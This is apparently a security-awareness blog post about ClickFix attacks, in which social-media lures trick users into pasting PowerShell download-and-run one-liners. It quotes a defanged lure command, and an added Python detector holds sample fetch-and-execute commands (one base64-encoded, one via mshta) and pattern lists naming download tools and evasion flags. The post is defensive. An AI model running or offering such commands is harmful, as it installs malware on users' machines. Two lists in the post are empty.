
ClickFix Attacks are Attacks You Should be Worried About in 2026

I have a simple request: Please stop falling for ClickFix attacks.

I realize not everyone knows what that means, but that’s why I’m here to help you. Essentially, you’re being manipulated through your clipboard and your appetite for free stuff. You are literally being fooled into hacking yourself.

What is ClickFix?

ClickFix is a social engineering attack that plays on a human’s desire to trust, the need to believe what they read or see online. It is also a clipboard-level attack, because you trust whatever lands on your clipboard when you paste it. Either way, the exploit flows through you, the end user.

It starts like this:

Someone on TikTok or Instagram posts a video claiming you can get “Free Photoshop” or “Spotify Premium” with a simple “hack” through your command prompt. They drop a single PowerShell command and say, “Just paste this and it’s done.”

The video is always very catchy: music, an AI-generated voice, a clip of the code being pasted and run. The result always looks simple and easy, too good to be true, because it is. You are being talked into pasting something that will flood your system with malicious code. The comments and likes on the videos are usually bots meant to make it look safe.

The most popular version of the attack usually looks something like this:

iex (irm hxxps://scamdomain[.]com/spotify)

The attack can also look like a simple instruction list, or a “Click here to copy the code” button that puts a payload on your clipboard that you never actually see. When you paste it, all hell breaks loose.

Aftermath and Reality

That’s it: one simple line of code, and you have handed attackers control of your PC. Sure, they might turn your machine into a bot, but the most likely target is your private data.

Best case scenario? You get hit with a RAT or some really lame malware. Worst case? You get hit with ransomware and are locked out of your machine unless you agree to pay.

Either way, you are looking at a reality where your data is completely compromised. Info stealers are everywhere, and your data is valuable even if you don’t think so. Once you are compromised, you can at a minimum assume:

You have to be vigilant because there is no app that will make you more aware.

Image: A TikTok user sharing a video that would likely end in your PC being infected with an info stealer. Credit to CERN for the image.

Prevention and Education

So what is happening? Simply put, that one line of code connects to a remote server, downloads a script, and runs it on your machine. In the example above, irm (Invoke-RestMethod) fetches whatever the URL returns and iex (Invoke-Expression) immediately runs that text as PowerShell, so the first stage never even has to be saved as a file. It could be malware, info stealers, backdoors. It could be anything. Something that is usually difficult to execute on a target’s system is literally hand delivered by you.
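To make that mechanism concrete, here is an added example that is not part of the original post and not code from the author or the ClickGrab project. It is a small Python checker you could point at the text on your clipboard (or at the script block text from PowerShell event ID 4104) before anything runs. It refangs defanged URLs, decodes a -EncodedCommand blob, and flags the two halves that define a ClickFix one-liner: fetching remote content and running the fetched text as code. All domains, sample commands and pattern lists below are constructed for illustration.

```python
"""Flag ClickFix-style download-and-execute one-liners before they are pasted.

Added example, not part of the original post. The sample commands, domains
and pattern lists are constructed for illustration.
"""
import base64
import binascii
import re

# Cmdlets, aliases, .NET calls and LOLBins that pull content from a URL.
# mshta is listed here and under EXECUTE_RE because it fetches and runs in one step.
DOWNLOAD_RE = re.compile(
    r"(?i)\b(?:irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring|"
    r"downloadfile|start-bitstransfer|curl|wget|certutil|mshta)\b")
# Ways of running text as code: Invoke-Expression and its alias iex,
# the call operator on a parenthesised or script-block expression, and mshta.
EXECUTE_RE = re.compile(r"(?i)(?:\biex\b|\binvoke-expression\b|&\s*[(\[]|\bmshta\b)")
# Flags that hide the window or disable safety rails; common in lures.
EVASION_RE = re.compile(
    r"(?i)(?:-w(?:indowstyle)?\s+hidden|-nop\b|-noprofile\b|-ep\s+bypass|"
    r"-executionpolicy\s+bypass|-noni\b|-noninteractive\b)")
# -EncodedCommand and its short forms (-e, -ec, -enc), followed by base64.
ENCODED_RE = re.compile(r"(?i)-e(?:c|nc|ncoded|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")
URL_RE = re.compile(r"(?i)\bhttps?://[^\s'\"<>()\[\]]+")


def refang(text: str) -> str:
    """Undo common defanging (hxxp, [.], (.), [:]) so URLs can be matched."""
    text = re.sub(r"(?i)hxxp", "http", text)
    text = re.sub(r"[\[(]\.[\])]", ".", text)
    return text.replace("[:]", ":")


def decode_encoded_command(text: str):
    """Return the UTF-16LE script hidden behind -EncodedCommand, or None."""
    match = ENCODED_RE.search(text)
    if not match:
        return None
    try:
        raw = base64.b64decode(match.group(1), validate=True)
    except (binascii.Error, ValueError):
        return None
    return raw.decode("utf-16-le", errors="replace")


def analyze(command: str) -> dict:
    """Classify one command line as 'clean', 'suspicious' or 'clickfix'."""
    text = refang(command)
    decoded = decode_encoded_command(text)
    if decoded is not None:
        text = f"{text}\n{decoded}"  # inspect the decoded layer as well
    urls = URL_RE.findall(text)
    fetch = bool(DOWNLOAD_RE.search(text))
    execute = bool(EXECUTE_RE.search(text))
    evasion = EVASION_RE.findall(text)

    reasons = []
    if fetch:
        reasons.append("fetches remote content")
    if execute:
        reasons.append("runs fetched text as code")
    if decoded is not None:
        reasons.append("hides the real command behind -EncodedCommand")
    if evasion:
        reasons.append("uses evasion flags: " + ", ".join(evasion))

    if fetch and execute:
        verdict = "clickfix"  # the download-and-run pair is the signature
    elif reasons:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"verdict": verdict, "reasons": reasons, "urls": urls, "decoded": decoded}


# Constructed samples. The encoded one wraps PAYLOAD the way powershell.exe expects.
PAYLOAD = "iex (iwr https://example.invalid/p -UseBasicParsing).Content"
ENCODED_SAMPLE = "powershell -w hidden -nop -enc " + base64.b64encode(
    PAYLOAD.encode("utf-16-le")).decode("ascii")
SAMPLE_COMMANDS = [
    "iex (irm hxxps://scamdomain[.]com/spotify)",          # the lure from the post
    ENCODED_SAMPLE,                                          # same thing, base64-wrapped
    "mshta hxxps://scamdomain[.]com/fix.hta",               # 'copy this code' variant
    "irm https://example.invalid/readme.txt",               # download only
    r"Get-ChildItem C:\Users -Recurse | Select-Object Name",  # benign admin command
]

if __name__ == "__main__":
    for cmd in SAMPLE_COMMANDS:
        report = analyze(cmd)
        print(f"{report['verdict']:10} {cmd[:60]}")
        for reason in report["reasons"]:
            print(f"           - {reason}")
        if report["decoded"]:
            print(f"           decoded: {report['decoded']}")
```

The point of the two-pattern verdict is that neither half is damning on its own: downloading a text file is normal, and Invoke-Expression has legitimate uses, but a command that does both in one line with a URL you did not type is exactly the shape of every ClickFix lure. Anything marked "suspicious" still deserves a look, especially when an -EncodedCommand blob or a hidden-window flag is involved.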

So how do you prevent the attack?

  1. Don’t paste things into your command prompt.
  2. Don’t paste things into your command prompt.
  3. Don’t paste things into your command prompt.

Three simple strategies to prevent you from being manipulated, hacked, and turned into a data farm.

You didn’t listen to rules 1-3? You ran a command already? You didn’t get free Spotify Premium for life?

If you already ran a command, you might be out of luck. In the event you are still early, I would highly recommend a few basic mitigation steps:

Once again, the most vulnerable part of a PC is the user. Users don’t ask questions and run on impulse. We want to believe that we are privy to something special, something undiscovered. So we trust what we are told.

Do not paste commands from random videos online. Ever. If you don’t know what it does, don’t run it!

More Resources

If you are unsure about something you were told to paste or want to learn more you can check out a fantastic educational site run by John Hammond and The Hagg. They do an incredible job explaining things more in depth and give attack examples.

You can also use the ClickGrab Analyzer provided by The Hagg, found here: https://clickgrab.streamlit.app/. Paste in the URL you were given and it will help you check whether it looks malicious.

